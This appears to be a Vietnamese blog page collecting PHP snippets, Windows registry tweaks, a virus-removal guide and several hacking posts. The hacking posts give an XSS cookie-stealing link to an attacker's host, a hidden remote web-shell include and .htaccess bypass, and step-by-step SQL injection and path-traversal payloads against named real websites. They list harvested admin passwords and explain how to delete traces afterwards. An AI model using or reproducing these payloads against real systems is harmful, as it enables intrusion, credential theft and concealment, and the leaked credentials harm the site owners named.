Blog Lá Cải

Xac dinh filetype
<?PHP
// Make an array of the various attributes
$path_parts = pathinfo('/www/htdocs/index.html');

$extension = $path_parts['extension'];

echo $extension; // 'html'

?>

được đăng bởi Toi La Ai @ 06:04 0 Nhận xét

Copy
copy($file, $newfile);
Lay file size dang byte
filesize($filename);
Tat thong bao loi cua php
error_reporting(0);
Kiem tra file info.php co ton tai khong gia tri tra ve la tru hay false
file_exists('info.php');
Kiem tra ket thuc file chua gia tri tra ve la tru hay false
feof($file);
Doc file theo char
fgetc($file);
Doc file theo string hay theo tung dong
fgets($file);
Mo file welcome.txt de doc
fopen("welcome.txt","r");
Tra ve ten file bao gom phan mo rong hay chi ten file
$path = "index.php";
$file = basename($path); // $file la "index.php"
$file = basename($path, ".php"); // $file la "index"
$f = "path/to/file.xml#xpointer(/Texture)";
$file =basename($f, ".xml#xpointer(/Texture)") //$file la file
Tra ve thu muc cao hon mot cap
$path = "/etc/passwd";
$file = dirname($path); // $file la "/etc"
Tra ve phan mo rong cua file
$path_parts = pathinfo('/abc/dirname.jpg');
$extension = $path_parts['extension']; //$extension la jpg
Go bo thiet lap cho bien
$foo = 'bar';
unset($foo);
Lay thong tin ve dia cung
disk_free_space("C:");
disk_total_space("C:");
Ham chuyen byte sang mega giga ....
function HumanSize($Bytes)
{
$Type=array("", "kilo", "mega", "giga", "tera", "peta", "exa", "zetta", "yotta");
$Index=0;
while($Bytes>=1024)
{
$Bytes/=1024;
$Index++;
}
return("".$Bytes." ".$Type[$Index]."bytes");
}
phpftp
<?php
// set up basic connection
$ftp_server = "localhost";
$ftp_user_name = "dao";
$ftp_user_pass = "123";
$conn_id = ftp_connect($ftp_server);

// login with username and password
$login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);

// check connection
if ((!$conn_id) || (!$login_result)) {
echo "FTP connection has failed!";
echo "Attempted to connect to $ftp_server for user $ftp_user_name";
exit;
} else {
echo "Connected to $ftp_server, for user $ftp_user_name<br>";
}

// try to chmod $file to 644
$file = "abc";
if (ftp_chmod($conn_id, 0644, $file) !== false) {
echo "$file chmoded successfully to 644n";
} else {
echo "could not chmod $filen";
}

// try to delete $file
$file = "abc.zip";
if (ftp_delete($conn_id, $file)) {
echo "$file deleted successfuln";
} else {
echo "could not delete $filen";
}


//change dir
echo " Current directory: " . ftp_pwd($conn_id)."<br>";
if (ftp_chdir($conn_id, "file")) {
echo "Current directory is now: " . ftp_pwd($conn_id) . "<br>";
} else {
echo "Couldn't change directoryn";
}


//lay noi dung thu muc va in ra
$contents = ftp_nlist($conn_id, ".");
var_dump($contents);

//liet ke theo thu tu abc
$ftp_nlist = ftp_nlist($conn_id, ".");

sort($ftp_nlist);

foreach ($ftp_nlist as $v) {

//xac dinh thu muc va in ra
if (ftp_size($conn_id, $v) == -1) {
echo " " . $v . " <br />n";
}
}
foreach ($ftp_nlist as $v) {

//xac dinh file va in ra
if (!(ftp_size($conn_id, $v) == -1)) {
echo "" . $v . "<br />n";
}
}

// return to the parent directory
if (ftp_cdup($conn_id)) {
echo "cdup successful<br>";
} else {
echo "cdup not successfuln";
}
echo " Current directory: " . ftp_pwd($conn_id)."<br>";

//khai bao upload
$source_file = "cmdasp.zip";
$destination_file = "abc.zip";
$upload = ftp_put($conn_id, $destination_file, $source_file, FTP_BINARY);

// check upload status
if (!$upload) {
echo "FTP upload has failed!";
} else {
echo "Uploaded $source_file to $ftp_server as $destination_file<br>";
}

//download file
// duong dan file o xa va cuc bo
$remote_file = 'abc.zip';
$local_file = '007.zip';
// open some file to write to
$handle = fopen($local_file, 'w');
// download file $remote_file va save thanh $handle
if (ftp_fget($conn_id, $handle, $remote_file, FTP_ASCII, 0)) {
echo "Successfully written to $local_file<br>";
} else {
echo "There was a problem while downloading $remote_file to $local_filen";
}

// tao thu muc $dir
$dir = 'vvv';
if (ftp_mkdir($conn_id, $dir)) {
echo "Successfully created $dir<br>";
} else {
echo "There was a problem while creating $dirn";
}

$dir = 'vvv/bbb';
if (ftp_mkdir($conn_id, $dir)) {
echo "Successfully created $dir<br>";
} else {
echo "There was a problem while creating $dirn";
}

//doi ten $old_file to $new_file
$old_file = 'vvv/bbb';
$new_file = 'vvv/ccc';
if (ftp_rename($conn_id, $old_file, $new_file)) {
echo "Successfully renamed $old_file to $new_filen";
} else {
echo "There was a problem while renaming $old_file to $new_filen";
}

// close the FTP stream
ftp_close($conn_id);
?>

được đăng bởi THDao @ 22:43 0 Nhận xét

XSS hacking

*** Dấu hiệu nhận biết site mắc lỗi :
Cách thông dụng nhất là chèn script vào các biến truyền trực tiếp trên address, các exploit thường dựa trên cái này
Vd : http://sitebixss.com/index.php?act=[chèn xss vào đây]
Cái [chèn xss vào đây] thì chẳng thấy ai nói tới cả , chắc ai cũng nghĩ người khác là siêu sao

*** Cách chèn script :
Ta dùng javascript để chèn vào, trước hết xem qua các hàm sau cho biết sơ sơ đã
Bây giờ bạn vào 1 forum đi, vd ibf đi nhá (BKIT là VBB nên sẽ có dạng section khác IBF)
Okie, log in vào và thay address bằng đoạn code sau đây, y chang nhá
Code:

javascript:alert(document.cookie)



Thấy gì nào ? Nó sẽ ra có dạng thế này
Code:
acpcollapseprefs=900,1000,1350; forum_read=a:1:{i:2;i:1122471452;}; session_id=64e939f642a0315bc3fb655f7ef36bf6; member_id=1; pass_hash=c561a5a3859a0df75f76d98ae67bc026

[ Đoạn trên đây thử trên localhost nên các bác đừng thử fake cookie nhe ]

Rồi, nói nôm na là thế này, khi address của trình duyệt chính xác là 1 trang nào đó vd hcvteam.net thì lúc đó cookie của hcvteam.net sẽ được lưu tại trình duyệt với tên 1 biến là document.cookie
Bây giờ chỉ cần tạo 1 file php để truyền biến này cho nó làm việc, thế là xong
Code:
javascript:location="http://hostcuaban/cookie.php?cookie="+(document.cookie)

Hàm location để chuyển trình duyệt đến 1 trang khác, lưu ý lúc đó document.cookie sẽ thay bằng giá trị cookie, đó là chỗ tui thấy hay nhất.
Nếu hiểu được tới đây thì chắc chẳng còn gì để nói . Sau đây là cách exploit.

*** Cách exploit :
Đầu tiên tạo file cookie.php thế này up lên host của bạn

Code:





XSS giúp ta steal được cookie của victim, vì thế vd site bị xss thế này

Code:

http://sitexss.com/index.php?act=[xss]



Chúng ta khai thác thế này

Code:

http://sitexss.com/index.php?act=



Cookie victim sẽ lưu lại ở file xss.txt trên host của bạn
Bây giờ chỉ còn việc dụ "Alert" admin vào link trên là nó chết , nhớ đổi cái DIACHIDEDUDO.DUDO lai thành site bạn muốn nó vào sau khi cookie đã lưu lại ( nhằm giảm sự nghi ngờ thôi )

*** Vài lưu ý :
Đến đây là bạn có thể tự tin chơi XSS được rồi, đây là 3 điều nhỏ :
1/ Chỉ exploit được site nào có xài cookie, chứ "Alert" ACP của IBF dù nó có XSS 10000000 chỗ đi nữa thì cũng dek làm gì được ( nó xài session mà )
2/ Nên develope cái file php 1 vài cái, như mail về chẳng hạn, để dễ quản lý hơn
3/ Về javascript, bài của Mask_NBTA dùng window.open, nhưng mà bi giờ xài cái đó chẳng khác gì tự sát vì "Alert" nào cũng chống popup cả nên huythanh upgrade nó lên location

THE END ---- COPYRIGHT BY HCVTEAM.NET ---- YIM : thanh.1989

được đăng bởi vodanh @ 05:42 0 Nhận xét

Thủ thuật registry
1. Làm tăng tốc độ của Mouse
Tìm theo đường dẫn: HKEY_CURRENT_USERControl PanelMouse
Tạo một String value: "ActiveWindowTracking" bằng cách click chuột phải vào cửa sổ bên tay phải. Click đúp vào String trên rồi điền giá trị: 1 (nếu bạn điền giá trị 0 → loại bỏ chức năng của dòng String này).

* Để cho tiện (khỏi phải diễn giải ấy mà!), tôi sẽ trình bày theo mẫu ngắn gọn dưới đây:

Tìm theo đường dẫn: Key

Tạo một String value: Value Name

Gán giá trị: Data

Hiển thị chức năng: able

Tắt hiển thị chức năng: disable


2. Thay đổi tốc độ hiển thị Menu

Key: HKEY_CURRENT_USERControl PanelDesktop
Value Name: MenuShowDelay
Data: từ 0 đến 999 (bạn để 0 cho nhanh!)

3. Bật/Tắt tính năng AutoRun của CD-Rom

Key: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesCDRom
Value Name: Autorun
Data: (0=disable, 1=enable)

4. Điều chỉnh tốc độ của chuột (tốc độ cuộn bánh xe đối với chuột có bánh xe)

Key: HKEY_CURRENT_USERControl PanelDesktop
Value Name: WheelScrollLines
Data: 0 - 0xFFFFFFFF

5. Bỏ đi một số thứ không cần thiết trong Menu Start

Key: KEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Value Name: NoFavoritesMenu
Value Name: NoRecentDocsMenu
Value Name: NoRun

Data: (0=disable, 1=enable)

Value Name: NoLogOff
Data: 01 00 00 00

6. Tắt một số thứ liên quan đến hệ thống.

Key: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
Data: (0 = disable, 1 = enable)

"NoDispCPL" - Tắt/hiển thị Control Panel
"NoDispBackgroundPage" –Â'n Background Page
"NoDispScrSavPage" - Ẩn Screen Saver Page
"NoDispAppearancePage" Ẩ'n Appearance Page
"NoDispSettingsPage" - Ẩ'n Settings Page
"NoSecCPL" - Tắt Password Control Panel
"NoPwdPage" - Tắt Password Change Page
"NoAdminPage" - Tắt Remote Administration Page
"NoProfilePage" - Tắt User Profiles Page
"NoDevMgrPage" - Tắt Device Manager Page
"NoConfigPage" - Tắt Hardware Profiles Page
"NoFileSysPage" - Tắt File System Button
"NoVirtMemPage" - Tắt Virtual Memory Button

7. Xoá các lệnh trong Menu Run (Xoá cái nào hiếm khi dùng)

Key: HKEY_USERSDefaultSoftwareMicrosoftWindowsCurrentVersionExplorerRunMRU]
Data Type: REG_SZ

8. Bỏ tên chương trình cài đặt có trong Add/Remove Program:

Chỉ việc xoá đi những folder tương ứng với phần mềm trong mục này dòng sau:

Key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstall

9. Khoá chuột phải không cho click lên nền Explorer

[HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer]
Value Name: Notraycontextmenu
Value Name: Noviewcontextmenu

Data: (0 = disable, 1 = enable)

10. Hiện chữ bên cạnh đồng hồ

[HKEY_USERS.DEFAULTControl PanelInternational]
Value Name: sTimeFormat
Data: HH: mm: ss tt
Value Name: s1159

Value Name: s2359



11. Thêm đoạn Title lên phía trên của IE

Key: HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain
"Window Title"="Phi Nhung"

12. Tăng tốc Menu START



Key: HKEY_CURRENT_USERControl PanelDesktop
Tạo một String Value mới: "MenuShowDelay", nhập số từ 0 đến 30000 (nên nhập 0 vì nó là nhanh nhất)



13. Không cho phép chạy các ứng dụng môi trường DOS


Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersion PoliciesWinOldApp. Tạo mới DWORD Value "NoRealMode", gán giá trị 1
14. Đổi tên người cài đặt Windows


Key: HKEY_LOCAL_MACHINESoftwareMicrosoft Windows CurrentVersion. Trong mục "RegisteredOrganization" thay đổi tên người cài đặt.

15. Giấu lệnh Run của menu Start


Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersion PoliciesExplorer. Tạo mới DWORD Value "Norun" và gán giá trị 1.

16. Giấu lệnh Shut Down của menu Start


Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersion PoliciesExplorer. Tạo mới DWORD Value "NoClose", gán giá trị 1.

17. Giấu lệnh Find của menu Start


Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersion PoliciesExplorer. Tạo mới DWORD Value "Nofind", gán giá trị 1.

18. Không cho phép sử dụng Control Panel


Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersion PoliciesExplorer. Tạo mới DWORD Value "NoSetFolder", gán giá trị 1.

19. Không cho phép thay đổi máy in


Key: KEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersion PoliciesExplorer. Tạo mới DWORD Value "NoPrinterTab", gán giá trị 1.

20. Giấu Network Neighbourhood


Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersion PoliciesExplorer. Tạo mới DWORD Value "NoNetHood", gán giá trị 1.

21. Giấu tất cả những gì có trên desktop


Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersion PoliciesExplorer. Tạo mới DWORD Value "NoDesktop", gán giá trị 1.

22. Loại bỏ menu Documents khỏi menu Start


Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionPoliciesExplorer. Tạo mới BINARY Value "NoRecentDocsMenu", gán giá trị 01 00 00 00

23. Không cập nhật danh sách Documents


Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionPoliciesExplorer. Tạo mới BINARY Value "NoRecentDocsHistory", gán giá trị 01 00 00 00

24. Loại bỏ menu Log off khỏi menu Start


Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionPoliciesExplorer
Tạo mới BINARY Value "NoLogOff", gán giá trị 01 00 00 00



- Xóa history để lại trong Doduments, Run-History, URL-History
Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionPoliciesExplorer. Tạo mới BINARY Value "ClearRecentDocsOnExit", gán giá trị 01 00 00 00

25. Không cho phép xem hay thay đổi dung lượng bộ nhớ ảo của Windows


Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersion PoliciesSystem. Tạo mới DWORD Value "NoVirtMemPage", gán giá trị 1.



26. Không cho phép thay đổi password của máy



Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersion PoliciesSystem. Tạo mới DWORD Value "NoPwdPage", gán giá trị 1.



27. Không cho phép sử dụng Registry Editor (regedit.exe)


KEy: HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersion PoliciesSystem. Tạo mới DWORD Value "DisabledRegistryTools", gán giá trị 1.

28. Xoá Shared Doc's trong My Computer


Key: HKEY_LOCAL_MACHINESOFTWARE/ Microsoft/ Windows/CurrentVersion/ Explorer/ MyComputer/ NameSpace/ DelegateFolders.
Tìm tới key: {59031a47-3f72-44a7-89c5-5595fe6b30ee}.
rồi delete nó

29. Tăng tốc Network Browsing

Key: HKEY_LOCAL_MACHINE/Software/Microsoft/ Windows/CurrentVersion/Explorer/RemoteComputer/NameSpace
Tìm tới key: {D6277990-4C6A-11CF-8D87-00AA0060F5BF}

được đăng bởi THDao @ 06:33 0 Nhận xét

Ẩn shell trên server
chen doan ma vao trang php

if ($_REQUEST['go']=="langtuhaohoa") {
include ("http://link.com/remview.php");
}

thuc thi bang
index.php?go=langtuhaohoa

by pass anti php r57
<?php include("link_toi_con_shell.txt"); ?>
dung .htaccess
AddType application/x-httpd-php .txt

được đăng bởi THDao @ 06:31 0 Nhận xét

Đổi cổng Remote Desktop
- Mặc định port của Remote Desktop là 3389 chuyển thành port 7777. Mở Regedit tìm đến đường dẫn:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetContro lTerminal ServerWinStationsRDP-Tcp
- Double Click lên PortNumber và chọn Decimal và nhập vào 7777
- Restart lại máy
- Kiểm tra: từ máy khác nhập địa chỉ IP của máy làm Terminal Server và thêm số Port vào. VD: 192.168.1.1:7777

được đăng bởi THDao @ 06:30 0 Nhận xét

Hack

lâu quá không tham gia post bài,bữa nay ngạo mạn viết bài này cho chi tiết một chút cho anh em kiểm nghiêm nhé........(from :milw0rm).Bug này cực ký nguy hiểm,hàng ngàn site dùng chung mã nguồn này,chính vì thế a-e không nên làm hại đến SoftbizScripts.nghiêm cấm mọi hình thức deface nhé.
====Lõi này là SQL injection chắc các cụ đều biết cả nhỉ
bắt đầu nhé :
bước 1:
vào http://www.google.com.vn/
nhập vào từ khóa : allinurl: "store_info.php?id="
Ồ nó ra cả tá thế này biết chọn cái nào nhỉ he he
http://www.google.com.vn/search?q=allinurl:++%22store_info.php%3Fid%3D%22&hl=vi&lr=&as_qdr=all&start=30&sa=N
chọn cái này thử nhé :
http://www.pets4sale.com.au/store_info.php?id=40
heh he
bước 2:
thay số 40 bằng đoạn nầy
999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*
thì nó sẽ ra như thế này:
http://www.pets4sale.com.au/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,pwd,18,19,20,21,22/**/from/**/sbclassified_admin/*
ặc ặc nó ra cái gì thế này
ở trên là user :admin
dưới là pass1l0t-99
hehe
bây giờ sao đây
dằng nhập trực tiếp,,.....heheh nó dụ mình chẳng qua đăng nhập trức tiếp là cho mấy thằng ngu đăng ký của nó để nó hốt tiền đây,chẳng qua mấy thằng này chỉ là một user chảng có quyền gì heheh
bước 3:
đánh đừong đãn này
http://www.pets4sale.com.au/admin/
woa nó ra giao diễn đăng nhập của admin cớ đấy
đăng nhập vào bằng user và pass trên.....
sau đó thì contact cho admin nhé.....................
chúc a-e vui...............
Nhớ contact cho admin.....
trong lỗi này thì có thằng http://mangraovat.net/ cũng dùng source này,tuy nhien nó fix rùi nhưng mà vẫn còn,a-e cứ coi kỹ một chút,không tiện nói ra nhé......hehe
================================================================================
Có lẽ mình có duyên với SQL injection.
bấy giờ tớ chỉ chỉ cái link thui nhé
lên google search bằng cái từ khóa này nhé:
allinurl: "searchresult.php?sbcat_id="
rùi sao nhìu thế này nhỉ heeeeeeeeeu
chán we......hhuuuuuuuuuuuu
==>két quả http://www.google.com.vn/search?q=allinurl:++%22searchresult.php%3Fsbcat_id%3D%22&hl=vi&lr=&as_qdr=all&start=30&sa=N
tớ chọn cái site này nhé
http://www.cookbrazil.com/searchresult.php?sbcat_id=3
rùi thay số 149 trên thanh Address bằng đoạn này nhé 999999%20union/**/select/**/0,sbadmin_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,s badmin_pwd,17,18,19,20,21,22/**/from/**/sbrecipe_admin/*
Okie
Nó ra cái này :http://www.cookbrazil.com/searchresult.php?sbcat_id=999999%20union/**/select/**/0,sbadmin_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,s badmin_pwd,17,18,19,20,21,22/**/from/**/sbrecipe_admin/*
tớ thấy userr và pass rùi
username :amdin
passsao dài thế nhỉ):T*taxov2007
Okie bi giờ login để chiếm quyền kiếm soát nhé :
http://www.cookbrazil.com/admin/
đăng nhập bằng user và pass ở trên:
Thế là okie
soucre code from milw0rm.com
================================================================================
google keyword: allinurl: "index.php?Act=Merchants" Kết quả kha khá nhỉ? Thử thay trang tìm kiếm khác và vài từ khóa khác tự nghĩ ra nhé, hỏi là tớ chửi cho đấy.
Thử thằng đầu tiên nhé: http://www.eduaffiliates.com/index.php?Act=Merchants

1. http://www.eduaffiliates.com/admin/dump sẽ thấy backup-23-08-2007.sql cái gì đây, lol file backup của nó đấy.
Trong trường hợp thư mục được bảo vệ bằng 1 file index, .htaccess, nó chưa backup hoặc file backup đã quá cũ (ngày tháng năm backup nằm trong tên file ấy) mà mình muốn lấy file backup mới nhất thì sao.

2. Tạo file backup
- http://www.eduaffiliates.com/admin/backupstart.php click vào nút Backup
a. Quay lại: http://www.eduaffiliates.com/admin/dump sẽ thấy file backup-14-09-2007.sql là file ta vừa tạo ra (ngày 14-09-2007) get it.
b. Trong trường hợp thư mục được bảo vệ bằng 1 file index, bạn không thấy được thì làm sao download. Đơn giản: http://www.eduaffiliates.com/admin/dump/backup-dd-mm-yyyy.sql thay ngày tháng năm theo giờ sever nhé.
c. Trong trường hợp thư mục được bảo vệ bằng 1 file .htaccess bạn sẽ nhận lỗi Forbiden, cũng đơn giản thôi http://www.eduaffiliates.com/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql

3. Xóa dấu vết
Đây là bước quan trọng để admin không biết bị đột nhập: http://www.eduaffiliates.com/admin/deletebackup.php?fl=backup-dd-mm-yyyy.sql

COMPLETED - Bản quyền H2P
================================================================================
Bug này milw0rm.com search không có đâu nha

Code:
Search in google : "powered by Mini-nuke"
url scripting : http://www.victime.com/pages.asp?id=3%20un...+where+uye_id=1


EXAMPLE :

my victim : http://www.er-rufai.com/
url scripting :
http://www.er-rufai.com/pages.asp?id=3%20u...+where+uye_id=1

admin : Nizamettin
pass ( hash MD5 ) : 251dda522000d30ebf4dc5631157b5cf
Chỉ ảnh hưởng với version 2.3
ví dụ như của E sau khi search thế này: www.bilgiyerim.com
sau đó E paste cái code này vào: pages.asp?id=3%20u...+where+uye_id=1 trở thành thế này: http://www.bilgiyerim.com/pages.asp?id=3%20u...+where+uye_id=1
nó hiện thông báo thế này :

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'p_id = 3 u... where uye_id=1'.

/pages.asp, line 13
thế thì làm sao E có user và pass như câc A đã nói.
================================================================================
Theo như định dạng của các bug SQL injection tui đã giời thiệu các bug khác trên forum,bữa nay cũng là dạng này các bạn dùng theo thứ tự như trong mấy cái bug trước,các bạn thay làm sao cho phù hợp nhé......
Lên google search : "browsecats.php?cid="
Step 1:
Tìm cái user: dùng dòng lệnh
999999%20union/**/select/**/0,sb_admin_name,2,3/**/from/**/sbjbs_admin/*
Tìm pass:999999%20union/**/select/**/0,sb_pwd,2,3/**/from/**/sbjbs_admin/*
login bằng cách:http://sitename/admin/

em xin demo thử một trang đã bị hack bởi KGB gì đó rồi
http://www.informatycy.info/browsecats.php?cid=-1+union+select+0,sb_admin_name,2,3+from+sbjbs_admin/*
user: admin
http://www.informatycy.info/browsecats.php?cid=-1+union+select+0,sb_pwd,2,3+from+sbjbs_admin/*
pass: hiphop0

trang login:http://www.informatycy.info/admin/
http://www.milw0rm.com/exploits/4504
==============================
vuln code
| line 544: |
| if (!isset($_REQUEST['page'])){ |
| $_REQUEST['page']=$homepage; |
| $cpage=$_REQUEST['page']; |
| } else { $cpage=$_REQUEST['page']; } |
| |
| line 646: |
| if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
| if (file_exists("pages/".$cpage.".htm")){ |
| include("pages/".$cpage.".htm"); |
| } |
| else include("pages/".$cpage.".html"); |
| } |
|

Exploit : ?page=/../../../../../../../etc/passwd%00
Demo : http://www.doopthemes.com/?page=/../../../../../../../etc/passwd%00
==============================
Google search với từ khóa là: inurl:/webmail/index.php?lid=
Expolit của nó là: index.php?lid=de&tid=modern_blue&f_user=&six=&f_em ail=[XSS]
Ví dụ : https://955jazz.com:81/webmail/index.php?lid=6&tid=1&f_user=&six=&f_email=%22%3E%3Ch1%3ENull%20Code%20Services%3C/h1%3E=%22%3E%3Ciframe%20src=http://www.google.com/%3E%3C/iframe%3E
================================================================================
bữa nay buồn buồn lên ghé qua milw0rm.com tháy có cái SQL Injection liền check thử.........không ngờ ..............
thấy nó chuối quá liền viết một cái tut cho anh em học hỏi nhau.....
Tính đem vào "thi" mà thấy kỳ quá ...... nên thui,đành viết tut vậy.
Do thường những lỗi SQL injection này thì mỗi khi chúng có một bug nào đó trên source thì bao nhiêu site sử dụng cái source này đều bị.bởi thực sự những Cty hay những người viết code ra khi viết code cho khách hàng họ chỉ edit lại chứ không viết hoàn toàn từ a-z nên chính vì thế chúng ta có thể đánh sập tất cả các site nào sử dụng mã nguồn này.
nói liên thiên quá đi sâu vào vấn đề nhé:
Bắt đầu nào :
Step1:
vào google tìm theo từ khóa:
allinurl: "/kategori.asp?kat="(tìm bằng cách này sẽ đảm bảo hơn rằng những site này dùng cùng một source code)
trên Address:nó sẽ trở thành
http://www.google.com.vn/search?q=allinurl:++%22/kategori.asp%3Fkat%3D%22&hl=vi&lr=&as_qdr=all&star t=60&sa=N
woa woa..............nhiều thế.chọn cái site sau cho chắc ăn tức là trang 7,8 gì đấy..........thử trang bất kỳ coi thử:
tớ chọn trang này nhé :
http://sdelican.info/web/kategori.asp?kat=goster&id=4
bi giờ tớ thử thay 4 bằng doạn mã này :-1+union+select+0,1,adkull,3,4,5,6,7,8+from+ayar
note for code:phần này là lấy ra cái field tên là adkulltừ trong bảng ayar.
,mấy field 0,1,3,4,5,6,7,8 các bạn không cần quan tâm là field gì,chỉ sử lý field adkull là field tên user đăng nhập....
Okie.
Tức là nó sẽ trở thành thế này :http://sdelican.info/web/kategori.asp?kat=goster&id=-1+union+select+0,1,adkull,3,4,5,6,7,8+from+ayar
Nhấn Enter phát xem nó ra cái gì đây..................
Bùm bùm ...........á a..........á............bùm bùm................á .........áh bùm ...á.....bùm........á...........
Step2:
Nó hiện giữa màn hình là những cái gì đây.......chẳng cần biết
các bạn chỉ quan tâm sdelican....đây là thằng user đây....
Okie...biết được thằng user rùi....mình kiếm pass của thằng này phát xẻm có được không nhé :
Step 3:trở lại ban đầu thay thằng 4 bằng thằng
=-1+union+select+0,1,adsif,3,4,5,6,7,8+from+ayar Okie nhé
nó sẽ ra như thế này:http://sdelican.info/web/kategori.asp?kat=goster&id=-1+union+select+0,1,adsif,3,4,5,6,7,8+from+ayar
Ồ hố..............enter phát xem nào....................
ặc ặc nó ra cái gì nữa thế
pass hkông mã hóa hehe
allah165651--
ngon đây biết user và pass rùi mình làm sao nhỉ,chẳng bít có chỗ nào dể dùng thứ của nợ mần mò từ nãy đến giờ,hóa ra làm công không ah.......bỏ đi....thui chẳng làm nữa.....nhưng thui thử cái coi hên xui...........
đánh thử thêm thằng admin đằng sau xem nó có đúng đường dẫn không nào :http://sdelican.info/admin
Enter mọt phát:
Not Found
The requested document was not found on this server.
chán thế không phải rùi...
thử phát nữa chứ làm kiểu này nổi tình tò mò rùi,đánh
http://sdelican.info/web/admin/ phát,rùi Enter một phát.................á á................có màn hình để xài thằng kia rùi.
Step4
Bi giờ thử dùng user và pass trên coi như thế nào nhỉ,Enter phát xem sao....hehhe vào đựoc admin rùi thành công rùi..................hahhaaaaa.
Hên thế lâu lâu gặp quả hên mừng thía..........nhờ mấy anh em chỉ bảo thếm nữa nhé,tớ làm chưa đúng chỗ nào xin thỉnh giáo nhé.

được đăng bởi THDao @ 00:21 0 Nhận xét

Diệt virus fun

fun.xls.exe
Trong các ổ đĩa cứng sẽ xuất hiện file autorun.inf với nội dung như sau:

[AutoRun]
open=sal.xls.exe
shellexecute=sal.xls.exe
shellAutocommand=sal.xls.exe
shell=Auto
[VVflagRun]
aabb=kdkfjdkfk11

Trong Task Manager sẽ thấy xuất hiện một Process có tên algssl.exe với User Name là tên của người dùng đã logon vào hệ thống. Process này sẽ chạy mỗi khi máy tính mở, chính nó điều khiển việc "ẩn mình" của virus, tự động đăng ký khởi động cùng hệ thống, tự động tạo các file autorun cho các ổ cứng, thiết bị lưu trữ khác khi các thiết bị đó được gắn vào máy tính. Bạn cần phải ngừng process này trước tiên nếu muốn loại bỏ virus ra khỏi máy.

Các bạn hãy làm theo các bước sau đây để tận diệt chú này:
Bước 1: Không cho virus có cơ hội hành động.
1. Mở Task Manager, ở thẻ Processes, tìm Image Name nào có tên algssl.exe thì kill nó.
Tiếp theo là loại bỏ hai khóa trong msconfig/Startup có tên lần lượt là: msfir80.exe (HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunMsServer) và msime80.exe (HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunIMJPMIG8.2).

2. Mở My Computer

3* Quan Trọng lắm . Đối với các ổ cứng logic, nhấn chuột phải lên 1 ổ, chọn Open (note: đừng nhấn đúp chuột mà uổng công từ đầu đến giờ!).

4. Chuyển đến ô Address trên Explorer (phím tắt Alt+D), chuyển con trỏ về cuối và viết tiếp vào dòng address chuỗi autorun.inf rồi nhấn Enter

5. Xóa hết nội dung của file mới mở (thường được hiện bằng notepad). Save lại (Ctrl+S).

6. Lặp lại các bước 3, 4, 5 đối với các ổ logic còn lại. Hãy tuân thủ nghiêm ngặt chú ý ở bước 3.

7. Khởi động lại máy tính (có thể bỏ qua).

Bước 2: Khôi phục Folder Options.

1. Mở trình Group Policy (chạy lệnh gpedit.msc từ cửa sổ Run)

2. Tại nhánh User Configuration, chuyển vào mục Administrative Templates/Windows Explorer

3. Tìm đến khóa có tên: Removes the Folder Options menu item from the Tools menu, nhấn đúp chuột để mở cửa sổ Properties. Khi cửa sổ này hiện ra, hãy chọn vào nút Enabled rồi lại chọn vào nút Not Configured. Nhấn Apply và Ok để kết thúc công việc. Đóng các cửa sổ đó lại. Như vậy Folder Options đã được khôi phục.

Bước 2': Khôi phục mục chọn "Show hidden files and folders" (nếu bị ẩn mất hoặc không hoạt động).

1. Mở Registry Editor (chạy lệnh regedit từ cửa sổ Run).

2. Tìm đến khóa có tên như sau: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL

3. Tại vùng bên phải, tìm khóa có tên CheckedValue và DefaultValue. Hãy chắc chắn rằng hai khóa này có kiểu dữ liệu là REG_DWORD. Nếu hai khóa trên có kiểu khác, hãy xóa đi và lần lượt tạo mới chúng với kiểu dữ liệu đều là REG_DWORD và giá trị lần lượt là 1 và 2. (tạo mới bằng cách click phải chuột và chọn new>>DWORD value)
Vậy là đã xong, tiếp tục lê "máy chém" sang bước 3 ^_*

Bước 3: mở folder option ở thẻ view
chọn "show hidden file and folder"
click bỏ "hide axtention for knows file types"
click bỏ "hide protected operating sýtem file"
Xóa hết mấy thằng cha sal.xls.exe trong thư mục gốc của các ổ đĩa logic
Hiện các file ẩn lên và kill em all (he he! đừng có delete lung tung! tui chỉ biểu xóa hết sal.xls.exe thôi đó -_^)

BẠN CỨ YÊN TÂM DIỆT THỬ ĐI VÌ CON NÀY CŨNG TƯƠNG TỰ CON "FUN.XLS.EXE"
